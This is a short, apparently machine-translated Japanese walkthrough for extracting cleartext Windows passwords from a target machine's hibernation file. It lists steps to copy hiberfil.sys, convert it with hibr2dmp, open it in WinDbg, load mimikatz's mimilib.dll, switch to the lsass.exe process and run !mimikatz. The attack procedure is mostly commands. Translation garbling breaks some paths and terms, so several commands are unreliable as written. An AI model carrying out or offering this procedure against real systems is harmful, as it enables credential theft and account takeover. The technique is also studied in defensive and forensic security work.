準備する
計画を実施するには、次のユーティリティが必要です。
- Windows用デバッグツール 。
- メモリはWindowsのツールキットの無料版を、
- そして、実際、 ミミカッツ自身。
アクション
1.ターゲットマシンからhiberfil.sysファイルを取得します。
2.ファイルをWinDbgが理解できる形式に変換します。
hibr2dmp.exe d:\ temp \ hiberfil.sys c:\ temp \ hiberfil.dmp
このプロセスにはかなり時間がかかる場合があります。
3. WinDbgを実行し、結果のファイルを開きます。
ファイル->クラッシュダンプを開く
4.デバッグシンボルを構成します。
ファイル->シンボルファイルパス...を開き、次の行を入力します。
SRV * c:\シンボル* http://msdl.microsoft.com/download/symbols
c:\シンボルの代わりに、当然、シンボルがロードされるディレクトリがあります
デバッガーのコマンドラインでは、次のように記述します。
0:kd> .reload / n
キャラクターのロードを待っています:
5. mimilib.dllライブラリへのパスを指定します(mimikatzのあるディレクトリにあります)。
0:kd> .load z:\ Soft \ Security \ Passwords \ Mimikatz \ x64 \ mimilib.dll
6. lsass.exeプロセスのアドレスを見つけます。
0:kd> !プロセス0 0 lsass.exe
この場合、アドレスはfffffa800a7d9060です。
7.プロセスのコンテキストを切り替えます。
0:kd> .process / r / p fffffa800a7d9060
8. mimikatzを実行し、クリアテキストでパスワードを取得します。
0:kd> !ミミカッツ
関連リンク
Microsoft Windows資格情報開示: http : //www.securitylab.ru/vulnerability/420418.php
LSA認証: https : //msdn.microsoft.com/en-us/library/windows/desktop/aa378326(v=vs.85).aspx
:何のための認証ダイジェストですhttps://technet.microsoft.com/en-us/library/cc778868(WS.10).aspx